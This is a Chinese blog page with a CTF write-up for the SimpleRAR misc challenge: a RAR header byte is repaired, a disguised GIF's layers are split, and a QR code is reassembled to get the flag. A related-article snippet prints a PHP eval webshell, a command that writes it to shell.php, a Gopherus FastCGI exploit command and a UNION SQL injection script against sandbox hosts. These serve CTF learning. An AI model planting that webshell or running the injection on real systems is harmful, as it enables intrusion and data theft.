SimpleRAR的writeup

最新推荐文章于 2025-11-08 17:15:55 发布
原创 最新推荐文章于 2025-11-08 17:15:55 发布 · 777 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文详细解析了攻防世界Misc部分的SimpleRAR挑战。通过修复损坏的压缩包文件头,解压并分析png图层,最终利用二维码揭示flag:yanji4n_bu_we1shi。

    大家好,这次为大家带来攻防世界misc部分SimpleRAR的writeup。
    先下载附件,发现是一个压缩包,尝试解压,然而出问题了。

在这里插入图片描述

    提示是文件头被损坏,用winhex打开,果然,A8 3C 74被改成了A8 3C 7A,再改回来就行。

在这里插入图片描述

    保存后解压,打开flag.txt,没有发现flag。随后打开png图,一片空白,这时想到题目描述说有双图层,用winhex打开png图,果不其然,这是个gif文件,修改后缀名后用Photoshop打开。然后将每个图层单独保存。再用stegsolve分别查看。

在这里插入图片描述

    发现二维码,保存后放进Photoshop里拼接一下,再补上定位码。

在这里插入图片描述

    扫一下码。

在这里插入图片描述

    于是得到flag:yanji4n_bu_we1shi。

08067ctf-Misc-SimpleRAR-WriteUp
王德宝的博客
05-23 814
08067ctf-Misc-SimpleRAR 在功防世界misc基础区可以找到
MISC——SimpleRAR
m0_74426634的博客
04-18 484
发现flag.txt是假的,并且告诉我们不在这,那么flag有可能藏在png文件里,但是打开是空白,用HxD打开,发现是GIF文件。打开下载好的附件,发现有关文件的头部被破坏。将他们拼接起来,识别二维码,得到flag。得到两个文件,将他们下载下来,用。打开压缩包,查看里面的文件。将文件后缀名改为gif,用。
攻防世界-Misc-SimpleRAR
最新发布
2301_80797059的博客
11-08 1199
1.rar文件头构成2.gif帧分离3.色道转换4.二维码修复。
CTF压缩包的那点事
qq_43633585的博客
09-20 2062
zip伪加密 第一个标记条中:(压缩源文件数据区初始位置) 504B0304(文件头标记,4bytes) 1400(解压文件所需pkware版本,2bytes) 0900(全局方式位标记,2bytes)软件识别加密 第二个标记条中:(压缩源文件目录区初始位置) 504B0102(目录中文件文件头标记,4bytes) 1E03(压缩使用的pkware版本,2bytes) 1400(解压文件所需pkware版本,2bytes) 0000(全局方式位标记,2bytes)压缩软件识别未加密标志 将全局方式.
SimpleRAR
→_→
12-18 1150
SimpleRAR(来源:攻防世界) 1.关卡描述 2.解题步骤 分析: 上面说到双图层,还有拼图,那肯定与图片有关 我们下载附件 发现有一个文本,但里面没有flag,那我们使用erditor或者winhex分析一下: 发现了一张图片,foremost分离出来,发现不行 ,改后缀也不行,也没看到png的文件头,不知道如何去做了。 ============================ 参考: 正确的思路是,下载的附件是rar,很有可能考查的是rar隐写的问题,我们使用win
攻防世界杂项 SimpleRAR
hhh
05-07 1万+
SimpleRAR 现在这年头做个杂项还顺便教PS的嘛(手动微笑 ----------------------------------------------------------------------------------------------正经的分割线 附件是一个RAR压缩包,解压缩之后只有一个txt文件,上面写着: (RAR:可把我给牛逼坏了 然后……例行用w...
攻防世界 - MISC - 06 - SimpleRAR
古月浪子的博客
10-03 1万+
攻防世界 - MISC - 06 - SimpleRAR审题思路知识点所需工具解题flag反思与心得 审题 思路 知识点 考查选手对rar文件头的理解、winhex更改文件的能力、PS提取图层的能力、CTF工具的使用、PS图像处理能力 所需工具 WinRAR、winhex、PhotoShop、StegSolve 解题 使用WinRAR打开附件,发现secret.png的文件头损坏了,并且还有一个...
2021 CVVD首届车联网漏洞挖掘赛线上初赛 Writeup
SkYe's Blog
05-09 3609
jwt 原题 https://blog.youkuaiyun.com/weixin_46676743/article/details/113726655 带着 Authorization:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImVicmVidW5hIiwicGFzc3dvcmQiOiIiLCJhZG1pbiI6ImdlaHIiLCJpYXQiOjE2MjA0NTgwMzJ9.QkpCPfCtmMmeEYRoLFzzT8ag7mIaIPIcbZLZAB
CTF-练习平台部分writeup
热门推荐
hijack89的博客
04-03 4万+
CTF-练习平台writeupCTF-练习平台MISC滴答~滴看标题基本就知道是摩尔斯密码“.”、”-“,直接在线摩尔斯解密 聪明的小羊小羊。。。老套路 翻栅栏,栅栏密码。。。比较简单,直接看出来是两栏加密 KEY{sad23jjdsa2}这是一张单纯的图片??看题目估计是道隐写术的题,先保存图片的说; 30分的题,估计不会太难,直接文本编辑器打开;文本末尾发现了一行转义序列: 看来这
DMCTF部分题目writeup
qq_51429131的博客
11-29 1693
DMCTF部分题目writeup 文章目录DMCTF部分题目writeup一、Reverse二、Web三、Crypto四、MiscE·N·D 首先说明本蒟蒻是大一菜鸡,刚刚入门CTF,啥也不会,就凭着Google硬搜硬写,混了些许分数 大部分题都能在网上找到类似的题目或者相应的轮子,跟着先辈们一步一步就能混到些许分数 这些writeup是我个人的写法,如果有更好的更绝妙的写法请大佬手下留情,希望大佬们不吝赐教|・ω・`) 一、Reverse 就做了一道题,我太菜了,真的还有写wp的必要么(悲) _(:з」∠
攻防世界 SimpleRAR(文件块、Stegsolve工具的疑惑、ps详细操作)
太阳照耀我走四方
08-16 1025
title: 攻防世界 SimpleRAR date: 2021年8月16日 09点41分 tags: 攻防世界 categories: 攻防世界 这个题做到一半,为什么突然单独写一篇wp,因为做题的时候,对我帮助很大,所以想单独写一篇文章来记录一下。 1、rar压缩包 下载之后,发现是rar压缩包,准备解压的时候,我的winrar告诉我有一个图片的头被损坏。 解压之后,只得到了一个txt,我肯定是不信的。 这里一开始我以为是rar文件头被修改了。 然后百度一波,rar文件头, rar文件头格式:52 .
电子-SimpleMei.rar
09-05
电子-SimpleMei.rar,单片机/嵌入式STM8
CTF真题复现:SimpleRAR文件头修复与GIF隐写联合解法.pdf
06-18
该文档【CTF真题复现:SimpleRAR文件头修复与GIF隐写联合解法】共计 18 页,文档支持目录章节跳转同时还支持阅读器左侧书签大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿用作商业用途。从隐写术到编码转换,从音频隐写到文件结构分析,CTF-Misc 教会你用技术的眼睛发现数据中的「彩蛋」。掌握 Stegsolve、CyberChef、Audacity 等工具,合法破解摩斯密码、二维码、LSB 隐写,在虚拟战场中提升网络安全意识与技术能力。记住:所有技术仅用于学习与竞赛!更多精品资源请访问 https://blog.youkuaiyun.com/ashyyyy/article/details/146464041
攻防世界Misc——SimpleRAR
weixin_74738833的博客
04-07 581
攻防世界Misc——SimpleRAR
攻防世界MISC:SimpleRAR
juicy_peach_的博客
11-30 1102
攻防世界MSIC:SimpleRAR
攻防世界-MISC:SimpleRAR
m0_56161093的博客
11-21 1382
这是攻防世界新手练习区的第十题,题目如下: 点击下载附件1,是一个RAR文件,解压一下,得到flag.txt文件,激动的点进去看一下 好吧,就知道没有这么简单,用010editor打开这个RAR文件,发现还有个png文件 为什么会解压不出来呢。嗯,百度一波,说是压缩包坏掉了。这里整理了一下RAR文件的数据块组成 这道题这里是文件开头,所以要将08 3C 7A改为08 3C 74即可 改完后再进行解压,png文件已经被解压出来了,打开后发现空白,再用010editor打开它,发现是个gif文件,改
攻防世界misc新手区-SimpleRAR
star_feather的博客
04-22 617
下载附件后,解压并打开压缩包,发现只有一个txt文件, 打开后并没有flag,因为题目中提示有双层图,猜测压缩包中应该还有一个图片文件,用winhex打开压缩包,发现还有一个图片,把图片开头的部分的7A改为74(因为我们需要的是文件块而不是子块), 保存后重新解压打开,就出现了一个png图片,打开图片发现是一片空白,想到题目中说这是双层图,所以应该需要分离,用PS打开图片,发现提示这不是一个p...
攻防世界Misc入门题之SimpleRAR
沐一 · 林 的博客
08-18 1328
攻防世界Misc入门题之SimpleRAR 继续开启全栈梦想之逆向之旅~ 这题是攻防世界Misc入门题之SimpleRAR 我一直很讨厌做二维码拼接类的题,真的,每次都要拼好久~ 下载了个RAR压缩包,压缩包解压不开,提示损坏了,第一个考点就是压缩包的文件结构错误,导致解压不了secret.png,只解压出了flag.txt: flag.txt打开后里面还是啥都没有的: 然后查资料,一篇看上去是软妹的好博客: https://blog.youkuaiyun.com/destiny1507/article/det
【攻防世界】十、SimpleRAR
Hi~ 土拨鼠
10-22 1013
步骤 下载所给附件,发现是一个rar压缩文件,解压之后应该可以发现里面有一个flag.txt文件,还有一个secret.png提示文件头损坏没解压出来,我第一次使用winzip直接提示我无效文档??? 然后我不信邪又用kali里的命令进行解压缩,成功解压出来flag.txt文件,并提示我secret.png文件头损坏 打开flag.txt文件进行查看,发现是一个烟雾弹 再次吐槽一下winzip真是lj,选对工具真的是非常非常重要! 那么线索只能是在secret.png文件里了,根据题目描述搞错了一块.
writeup
09-26
以下是部分 CTFHub web 基础教程的 writeup: - **信息泄漏**: ```bash # 安装 dirsearch 包 sudo apt-get install dirsearch # 目录扫描,-u 用于指定要扫描的 URL sudo dirsearch -u "http://challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/" # 进入相关目录 ls cd site ls cd challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/ ls # 扫描程序获取当前 Git 仓库的提交历史信息 git log # 在 Git 中配置一个名为 safe.directory 的全局设置,指定安全目录 git config --global --add safe.directory /home/kali/Desktop/GitHack/site/challenge-74ace4f302db1181.sandbox.ctfhub.com:10800 ls git log ``` - **SSRF 通关攻略之 FastCGI 协议**: ```bash # 在 kali 里下载 gopherus 工具并解压 git clone https://github.com/tarunkant/Gopherus.git # 在文件里打开终端,执行命令 python2 gopherus.py --exploit fastcgi ``` 判断文件是否存在,通过访问不同文件观察返回信息: ```bash # 尝试访问首页文件 访问首页文件 index.php # 访问不存在的文件 输入 wjf.php 显示 404,说明 index.php 存在 ``` 注入木马及编码操作: ```bash # 一句话木马 <?php @eval($_POST[&#39;cmd&#39;]);?> # base64 编码 PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= # 解码并保存为 shell.php echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" | base64 -d > shell.php ``` 连接木马: ```bash # 打开蚁剑,右键添加数据,添加木马文件 http://challenge-641b288f17028a60.sandbox.ctfhub.com:10800/wjf123.php ``` - **SQL 注入**: ```python import requests def mySQL(payload): url = &#39;http://challenge-196392c6b0acebd8.sandbox.ctfhub.com:10800/&#39; header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36", "Cookie": "id=-1 " + payload + "; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F", } r = requests.get(url, headers=header) return r.text print(mySQL("union select 1,group_concat(schema_name)from information_schema.schemata")) print(mySQL("union select 1,group_concat(table_name) from information_schema.tables where table_schema=&#39;sqli&#39;")) print(mySQL("union select 1,group_concat(column_name) from information_schema.columns where table_schema=&#39;sqli&#39; and table_name=&#39;srdnlrlphq&#39;")) print(mySQL("union select 1,group_concat(icehhmfjxt) from sqli.srdnlrlphq")) ``` - **XSS**:分析完后利用前面的 XSS 网站生成 XSS 攻击代码。注册完进入页面,点击“我的项目”后面的“创建”,选择默认配置,拉到最下面点击“下一步”,将生成的代码拼接到原题目网址后面的 `?name=` 后面,再输入到第二个框内,点击“send”。成功后回到 XSS 网站点击项目内容查看记录[^3]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值